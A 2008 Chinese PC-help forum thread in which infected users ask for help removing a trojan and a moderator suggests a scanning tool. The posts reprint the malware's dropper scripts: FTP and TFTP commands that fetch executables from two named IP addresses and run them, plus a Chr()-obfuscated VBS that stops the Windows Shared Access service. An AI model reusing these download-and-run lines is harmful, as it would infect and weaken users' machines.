1   1  /  1  页   跳转

一个奇怪的病毒

收藏
本主题由 版主 天月来了 于 2008-6-22 17:57:12 执行 关闭主题/取消 操作
adarsysy
头像
初生襁褓狮
  • 帖子:2
  • 注册: 2008-03-10
  • 来自:
发表于: 2008-03-10 10:59 | 只看楼主 短消息 资料
字号: 1楼

一个奇怪的病毒

小弟的机器是WIN2000的系统,几天前染毒,一直没能清理掉它,安全软件装的有卡巴斯基6.0个人版,360安全卫士,用它们进行扫描,结果那是相当差!!!它们居然一个也查不到,显示我的系统正常!现在把我机器的情况说明一下:

先让大家看看木马病毒下到C根目录下的文件一些源码

                                hgl1.bat
                                    ftp -s:c:\hgl1.txt
                                    c:\my_70153.exe
                                    c:\1022.exe
                                    c:\setup1004.exe
                                    c:\yoyo.exe

                                hgl1.txt
                                    open 219.153.11.219
                                    test
                                    test
                                    get 88.exe c:\1022.exe
                                    get 66.exe c:\my_70153.exe
                                    get 99.exe c:\setup1004.exe
                                    get 77.exe c:\yoyo.exe
                                    quit

                              fbn3.bat
                                    tftp -i 61.175.194.140 get my_70153.exe
                                    tftp -i 61.175.194.140 get setup1004.exe
                                    tftp -i 61.175.194.140 get 1022.exe
                                    tftp -i 61.175.194.140 get yoyo.exe
                                    my_70153.exe
                                  1022.exe
                                    setup1004.exe
                                    yoyo.exe     

360的进程表分析里面全是安全的进程,我这两天结合卡巴发现,当系统调用winmgmt.exe(安全进程)时,接着进程表里就会出现cmd.exe,cscript.exe,ftp.exe,tftp.exe.这些都是安全进程,接着它就会出现一个run.vbs或run2.vbs(因为先前我删了它,所以没有内容给你们看),还有个firefoxupdater.exe(这个的名字记不很清楚),这些被卡巴的注册表保护阻止之后就会消失,所以也查不到了,一般还会在%systemroot%system32%inf下面释放三个文件,其中一个是svchosts.exe,现在最让我烦的是它们隔一段时间发一次,没办法查的到它,请高手指点一下!!!


[用户系统信息]Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
最后编辑2008-04-18 23:02:32.623000000
分享到:
gototop
 
adarsysy
头像
初生襁褓狮
  • 帖子:2
  • 注册: 2008-03-10
  • 来自:
发表于: 2008-03-10 11:12 | 只看楼主 短消息 资料
字号: 2楼

刚发作了一次,现在是run2.vbs的内容
set shell = wscript.createobject (Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108))
shell.run Chr(110)+Chr(101)+Chr(116)+Chr(32)+Chr(115)+Chr(116)+Chr(111)+Chr(112)+Chr(32)+Chr(115)+Chr(104)+Chr(97)+Chr(114)+Chr(101)+Chr(100)+Chr(97)+Chr(99)+Chr(99)+Chr(101)+Chr(115)+Chr(115),Chr(48)
shell.run Chr(37)+Chr(119)+Chr(105)+Chr(110)+Chr(100)+Chr(105)+Chr(114)+Chr(37)+Chr(92)+Chr(114)+Chr(117)+Chr(110)+Chr(46)+Chr(118)+Chr(98)+Chr(115),Chr(48)
gototop
 
天月来了
头像
版主
  • 帖子:76904
  • 注册: 2007-02-06
  • 来自:
发表于: 2008-03-10 11:16 | 短消息 资料
字号: 3楼

如果不是局域网

就扫个SRENG日志看看

扫SRENG日志发论坛来
http://www.kztechs.com/sreng/download.html
下载System Repair Engineer
1 解压缩sreng2.zip(建议解压到系统Windows文件夹里)
2 运行SREng.exe  ((将SREng.exe改名为123.com运行))
3 智能扫描=》扫描=》保存报告
4 把报告保存后,直接将日志内容彻底复制到一个空记事本里,然后再保存,就可以以附件的形式发论坛来了。
一定以附件形式发这论坛来。
点击我这贴右下角的“引用”然后就应该知道怎么发了。
gototop
 
yrx1984
头像
初生襁褓狮
  • 帖子:1
  • 注册: 2008-04-18
  • 来自:
发表于: 2008-04-18 23:02 | 短消息 资料
字号: 4楼

郁闷阿,我也中这个病毒了.system32文件夹下会出现几个假冒系统文件的随机字母的病毒程序。现在最大问题是上不了网,但可以上q。杀毒都可以打开,只有防火墙打开和系统文件显示有问题。请教大虾谁知道怎么处理呢?
gototop
 
五生
头像
初生襁褓狮
  • 帖子:6
  • 注册: 2007-10-23
  • 来自:
发表于: 2008-06-22 17:42 | 短消息 资料
字号: 5楼

回复: 一个奇怪的病毒



引用:
原帖由 天月来了 于 2008-3-10 11:16:00 发表
如果不是局域网<br><br>就扫个SRENG日志看看<br><br>扫SRENG日志xxx坛来<br><a href="http://www.kztechs.com/sreng/download.html" target="_blank">http://www.kztechs.com/sreng/download.html<;/a><br>下载System Repair Engineer <br>1


HELP,扫描的报告见附件,请大人帮忙看看有什么问题没有。
不知道什么时候中的,系统时间被修改成2004年2月2日了,还删掉了一些run,run2等病毒。
其他症状就是网络自动断网,反复多次。但是重启后暂时没有发生不能上网的现象。

谢谢!

附件附件:

下载次数:126
文件类型:text/plain
文件大小:
上传时间:2008-6-22 17:41:34
描述:scan report
gototop
 
<<上一主题|下一主题>>
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT